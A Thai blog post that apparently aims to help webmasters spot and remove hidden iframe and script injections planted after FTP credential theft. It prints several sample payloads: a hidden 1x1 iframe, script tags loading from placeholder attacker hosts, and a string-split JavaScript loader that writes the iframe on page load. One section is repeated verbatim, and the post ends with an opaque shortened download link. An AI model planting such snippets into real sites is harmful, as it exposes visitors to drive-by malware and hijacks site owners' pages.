ช่วงนี้หลายเว็บโดน hacker วางสคริปไม่พึ่งประสงค์บนหน้าเว็บ ซึ่งบางครั้งก็อาจะโดนจากเว็บที่ใช้ CMS แล้วไม่อัพเดตเวอร์ชั่น แต่หลังๆจะโดนจาก การขโมย user และ password FTP กันมากกว่า แล้วโดนมาจากอะไร มาตามกันต่อไป
หลักการทำงาน
แผนการของแฮกเกอร์ คือหาเว็บที่มีช่องโหว่ หรืออาจจะหาเครื่องที่ติดไวรัสหรือโทรจันของเขา อาจจะมาจากไฟล์ crack keygen หรือไฟล์ game trainer cheat ไฟล์พวกนี้มีไวรัส 99% เท่าที่ลองมา เมื่อได้แล้วไฟลืเหล่านี้จะฝังสคริปที่เป็น Trojan Horse หรือ ม้าโทรจันลงมาที่เครื่่องเรา ถ้าหากเราเป็นคนทำเว็บมันก็จะพยายามดักจับ user และ password FTP ของเว็บเรา จากนั้นมันก็ไปวาง code Iframeในไฟล์ index เพื่อ ทำลิ้งเชื่อมต่อไปยังเว็บของเขาเอง เพื่อให้ได้ Google rankings สูงๆ หรือไม่ก็ ลิ้งไปยังไฟล์ Trojan Horse เพื่อให้คนเปิดเว็บเราติดต่อไปเรื่อยๆ บางทีก็จะเป็นโปรแกรมคลิ๊ก googleads
ใครบ้างที่เสี่ยง
- cms ทั้งหลาย โบราณไม่อัพเดท joomla mambo wordpress magento อื่นอีกมากมาย
- หากคุณใช้โปรแกรมที่ crack มา และคุณเป็นคนทำเว็บที่ใช้ ftp
เว็บคุณโดนหรือยังตรวจสอบได้
หากใช้ firefox กด Ctrl+u หากใช้ IE 6 (ควรเปลี่ยน) คลิีก view >> view source IE8 คลิ๊ก page >> view source ดูว่า ล่างสุดของเว็บมี code <iframe>...</iframe> หรือไม่ ถ้ามีก็โดนละครับ
ตัวอย่าง
<iframe src=\?http://[^"]*? width=1 height=1 style=\?visibility:hidden;position:absolute\?></iframe>
echo \?<iframe src=\\\?http://[^"]*\? width=1 height=1 style=\\\?visibility:hidden;position:absolute\\\?></iframe>\?;
หรืออาจจะเขียนเป็น javaScript
<script src=http://testurl.com/h.js></script>
<script src=http://webhackher.net/hack_file.js></script>
โค้ด Iframe ปรกติ ในรูปแบบ HTML
<iframe src=http://testurl.com/hack/callfile.htm width=100 height=0></frame>
จับใส่ Javascript แล้วเรียกใช้เมื่อเปิดหน้าเว็บ
<script>
var apphack0 = "<if";
var apphack1 = "rame src=http://testurl.com/";
var apphack2 = "hack/callfile";
var apphack3 = ".htm";
var apphack3 = " width=100 height=0>"
var apphack4 = "</fra";
var apphack5 = "me>";
document.write(apphack0+apphack1+apphack2+apphack3+apphack4+apphack5 );
</script>
อธิบายสักนิด
จากโค้ด javaScript สร้าง ตัวแปร มาเก็บ url สำหรับการเรียกใช้ไฟล์ callfile.htm ซึ่งไฟล์ตัวนี้จะมีคำสั่งสำหรับเรียก ใช้งานสคริป
http://testurl.com/h.js < ให้ทำงานอีกที
<script src=http://testurl.com/h.js></script>
<script src=http://webhackher.net/hack_file.js></script>
โค้ด Iframe ปรกติ ในรูปแบบ HTML
<iframe src=http://testurl.com/hack/callfile.htm width=100 height=0></frame>
จับใส่ Javascript แล้วเรียกใช้เมื่อเปิดหน้าเว็บ
<script>
var apphack0 = "<if";
var apphack1 = "rame src=http://testurl.com/";
var apphack2 = "hack/callfile";
var apphack3 = ".htm";
var apphack3 = " width=100 height=0>"
var apphack4 = "</fra";
var apphack5 = "me>";
document.write(apphack0+apphack1+apphack2+apphack3+apphack4+apphack5 );
</script>
อธิบายสักนิด
จากโค้ด javaScript สร้าง ตัวแปร มาเก็บ url สำหรับการเรียกใช้ไฟล์ callfile.htm ซึ่งไฟล์ตัวนี้จะมีคำสั่งสำหรับเรียก ใช้งานสคริป
http://testurl.com/h.js < ให้ทำงานอีกที
วิธีแก้ไข
- หาไฟล์ที่ Hacker เขียนสคริปไว้ ส่วนใหญ่จะชื่อ index แล้วลบ code สคริปทิ้ง ทางที่ดีควรโหลดมาแล้วใช้โปรแกรม หาให้หมด
- เปลี่ยนรหัสผ่าน ของ FTP โดยให้ใช้ ตัวอักษร ตัวเลข และตัวพิเศษ เช่น ^%$@^#% ประกอบกันเป็น รหัสผ่าน
- สแกนไวรัสบนเครื่องของเรา ให้หมด ถ้าใช้โปรแกรม Antivirus ที่ Hack มา ก็ถอนออกซะ แล้ว ใช้ระบบ Scan Online เช่น http://www.eset.com/onlinescan/ http://www.kaspersky.com/virusscanner
- ติดตั้งตัวกันไวรัสใหม่ที่ไม่เสียเงินหรือซื้อ เพราะไม่แพงไม่ถึงพันบาท http://www.free-av.com หรือ http://free.avg.com
- ถ้าเป็นไปได้อย่าบันทึกรหัสผ่าน FTP ไว้ที่โปรแกรม
- หากคุณใช้โปรแกรม FTP ที่ Crack มาให้ใช้ winscp แทนฟรีและดี http://winscp.net/eng/download.php
มีไฟล์ระบบเตือน หากมีการเปลี่ยนแปลงขนาดของ index ที่หน้าเว็บ ลองเอาไปใช้กันดู
http://adf.ly/c7vcS < ดาวโหลดไปใช้ได้เลย สงสัย คอมเม้นถามได้
ใครมีปัญหาคอมเม้นได้เลย ยินดีช่วยเหลือ
ไม่มีความคิดเห็น:
แสดงความคิดเห็น